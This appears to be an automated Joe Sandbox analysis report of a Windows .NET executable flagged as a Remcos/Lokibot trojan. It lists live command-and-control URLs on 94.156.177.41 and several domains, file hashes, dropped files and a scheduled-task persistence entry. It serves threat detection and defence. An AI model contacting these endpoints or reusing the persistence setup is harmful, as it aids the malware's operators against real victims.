conhost.exe 21->31         started        signatures8 process9

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      FVR-N2411-07396.exe47%ReversingLabsByteCode-MSIL.Trojan.Remcos
                      FVR-N2411-07396.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe47%ReversingLabsByteCode-MSIL.Trojan.Remcos
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://94.156.177.41/soja/five/fre.php0%Avira URL Cloudsafe
                      94.156.177.41/soja/five/fre.php0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://kbfvzoboss.bid/alien/fre.phpfalse
                          high
                          http://alphastand.win/alien/fre.phpfalse
                            high
                            http://alphastand.trade/alien/fre.phpfalse
                              high
                              http://alphastand.top/alien/fre.phpfalse
                                high
                                http://94.156.177.41/soja/five/fre.phptrue
                                • Avira URL Cloud: safe
                                unknown
                                94.156.177.41/soja/five/fre.phptrue
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFVR-N2411-07396.exe, 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, ZeJFfrYmOnJKS.exe, 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.ibsensoftware.com/ZeJFfrYmOnJKS.exe, ZeJFfrYmOnJKS.exe, 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    94.156.177.41
                                    unknownBulgaria
                                    43561NET1-ASBGtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1564533
                                    Start date and time:2024-11-28 13:51:10 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 42s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:FVR-N2411-07396.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@16/13@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 71
                                    • Number of non-executed functions: 18
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.85.23.206, 4.175.87.197
                                    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: FVR-N2411-07396.exe
                                    TimeTypeDescription
                                    07:51:56API Interceptor63x Sleep call for process: FVR-N2411-07396.exe modified
                                    07:52:01API Interceptor17x Sleep call for process: powershell.exe modified
                                    07:52:03API Interceptor2x Sleep call for process: ZeJFfrYmOnJKS.exe modified
                                    13:52:02Task SchedulerRun new task: ZeJFfrYmOnJKS path: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    94.156.177.41Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                    • 94.156.177.41/simple/five/fre.php
                                    file.exeGet hashmaliciousLokibotBrowse
                                    • 94.156.177.41/maxzi/five/fre.php
                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                    • 94.156.177.41/simple/five/fre.php
                                    stthigns.docGet hashmaliciousLokibotBrowse
                                    • 94.156.177.41/maxzi/five/fre.php
                                    goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                    • 94.156.177.41/maxzi/five/fre.php
                                    PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                    • 94.156.177.41/maxzi/five/fre.php
                                    ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                    • 94.156.177.41/simple/five/fre.php
                                    greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                    • 94.156.177.41/simple/five/fre.php
                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                    • 94.156.177.41/simple/five/fre.php
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    bg.microsoft.map.fastly.net5c13e6.msiGet hashmaliciousAteraAgentBrowse
                                    • 199.232.214.172
                                    FACTURE NON PAYEE.pdfGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    goHB2EXlPf.exeGet hashmaliciousRedLine, SectopRATBrowse
                                    • 199.232.210.172
                                    goHB2EXlPf.exeGet hashmaliciousRedLine, SectopRATBrowse
                                    • 199.232.210.172
                                    9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                    • 199.232.210.172
                                    chutmarao.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                    • 199.232.210.172
                                    fpPn4XBjyk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                    • 199.232.210.172
                                    Banco Santander Totta - NOTIFICA#U00c7#U00c3O DE TRANSFER#U00caNCIA ELECTR#U00d3NICA.emlGet hashmaliciousCredentialStealerBrowse
                                    • 199.232.214.172
                                    invoice-1664809283.pdfGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    NF---710.msiGet hashmaliciousAteraAgentBrowse
                                    • 199.232.210.172
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    NET1-ASBGScan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                    • 94.156.177.41
                                    la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                    • 93.123.76.46
                                    efN78UF3Si.exeGet hashmaliciousDarkTortilla, SmokeLoaderBrowse
                                    • 94.156.177.166
                                    file.exeGet hashmaliciousLokibotBrowse
                                    • 94.156.177.41
                                    filepdf.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                    • 94.156.177.166
                                    putty .exeGet hashmaliciousDarkTortilla, SmokeLoaderBrowse
                                    • 94.156.177.166
                                    2.ps1Get hashmaliciousUnknownBrowse
                                    • 94.156.177.166
                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                    • 94.156.177.41
                                    stthigns.docGet hashmaliciousLokibotBrowse
                                    • 94.156.177.41
                                    goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                    • 94.156.177.41
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.34331486778365
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                    Process:C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.34331486778365
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2232
                                    Entropy (8bit):5.380192968514367
                                    Encrypted:false
                                    SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:+LHyIFKL3IZ2KRH9Oug8s
                                    MD5:2E16D2F2BF61526793175AF057C80E38
                                    SHA1:C646E8FE846DE9B54BF04679A5A9F5216DD5C7B9
                                    SHA-256:BA86B69C37F37E218D33B2643466FD3C5D2551C0215ABC36883C7A2D75C9848C
                                    SHA-512:3E95DF7756044BB4CAFE391CB8860B551621923B795B80FE6753DD5B1D11B9DCB5F41938B65761D6D7EE5689471A0AA7CE3EAF38A03A50399FA29704294AD34E
                                    Malicious:false
                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1586
                                    Entropy (8bit):5.116042999273181
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtFexvn:cgergYrFdOFzOzN33ODOiDdKrsuTFSv
                                    MD5:35E222D80776A510B78E9F5F4F67A7FE
                                    SHA1:1C34B1007B6EF798E5A64CB3712DD9D6F13141DB
                                    SHA-256:E7FE5B635CDF58FB4D692FAD191A73DBA47AED8BAAE75F21139767041BD112B6
                                    SHA-512:5F510949C6ACAB4CEE6E978634D02AFA45C510A0B070B43A884B6F4587932D503CD2F83488413F270A05E8C474452E93BA39AFEF80BD7A958D75955976C05FD7
                                    Malicious:true
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                    Process:C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1586
                                    Entropy (8bit):5.116042999273181
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtFexvn:cgergYrFdOFzOzN33ODOiDdKrsuTFSv
                                    MD5:35E222D80776A510B78E9F5F4F67A7FE
                                    SHA1:1C34B1007B6EF798E5A64CB3712DD9D6F13141DB
                                    SHA-256:E7FE5B635CDF58FB4D692FAD191A73DBA47AED8BAAE75F21139767041BD112B6
                                    SHA-512:5F510949C6ACAB4CEE6E978634D02AFA45C510A0B070B43A884B6F4587932D503CD2F83488413F270A05E8C474452E93BA39AFEF80BD7A958D75955976C05FD7
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                    Process:C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):47
                                    Entropy (8bit):1.168829563685559
                                    Encrypted:false
                                    SSDEEP:3:/lSll2DQi:AoMi
                                    MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                    SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                    SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                    SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                    Malicious:false
                                    Preview:........................................user.
                                    Process:C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):601088
                                    Entropy (8bit):7.722792552372322
                                    Encrypted:false
                                    SSDEEP:12288:ho1zGksv+SGjpA3yKUUo6acZi1bRKrweUbLtBHCMcqH6U6PWuv04MadSEpl:C1zGUxjD1bRK3VMcqH6UqMUHpl
                                    MD5:2F402635E17B4F0D9C0D6922D384936A
                                    SHA1:2753A159F2CF160733B1CEEEDE1DB57D2DDE0375
                                    SHA-256:BFD4E29505627B76243C4EA34C07B22AF7EDC00391B112E78C2DC3CF7A48D742
                                    SHA-512:96EC3A719566A081B060ED3812F5411E637B7F3EA5E3306EFFBE44D8284016E153182109B4F3C035AA31E8CC350C472FCFB59F5579006B14E0797040B2AA5A44
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 47%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!................0.."...........A... ...`....@.. ....................................@.................................pA..O....`..................................p............................................ ............... ..H............text....!... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................A......H.......PI..\'...........p..(..............................................}.....(.......(.......s#...}....*.0............(.....s......o.....*B..{......o%....*B..{......o$....*.0............{....(.......(....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0..5.........s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.
                                    Process:C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.722792552372322
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:FVR-N2411-07396.exe
                                    File size:601'088 bytes
                                    MD5:2f402635e17b4f0d9c0d6922d384936a
                                    SHA1:2753a159f2cf160733b1ceeede1db57d2dde0375
                                    SHA256:bfd4e29505627b76243c4ea34c07b22af7edc00391b112e78c2dc3cf7a48d742
                                    SHA512:96ec3a719566a081b060ed3812f5411e637b7f3ea5e3306effbe44d8284016e153182109b4f3c035aa31e8cc350c472fcfb59f5579006b14e0797040b2aa5a44
                                    SSDEEP:12288:ho1zGksv+SGjpA3yKUUo6acZi1bRKrweUbLtBHCMcqH6U6PWuv04MadSEpl:C1zGUxjD1bRK3VMcqH6UqMUHpl
                                    TLSH:DBD401852A6BE902C4E28BB055A2C2F447385DDDED12C353DBD97DFF7D3A31A24802A5
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!................0.."...........A... ...`....@.. ....................................@................................
                                    Icon Hash:00928e8e8686b000
                                    Entrypoint:0x4941c2
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0xD1D92115 [Fri Jul 25 11:18:45 2081 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
